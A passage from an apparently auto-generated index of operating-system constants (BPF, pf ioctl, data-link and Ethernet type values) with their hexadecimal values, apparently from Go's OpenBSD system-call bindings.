81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80104277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc110445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcd604404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcd60441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc028445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0e04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0284416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1204460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc110445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc110445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcd604407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcd604406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0104454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0104419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0284457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc080445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0e04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc4504443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc450443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc4504442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc4504448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc450443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc4504441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc4504444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc450443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc4504446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc4504447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc450443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc4504440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc450444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc4504445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc450444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc4504449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0284459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0284414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc0104451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc0104452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc0104453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 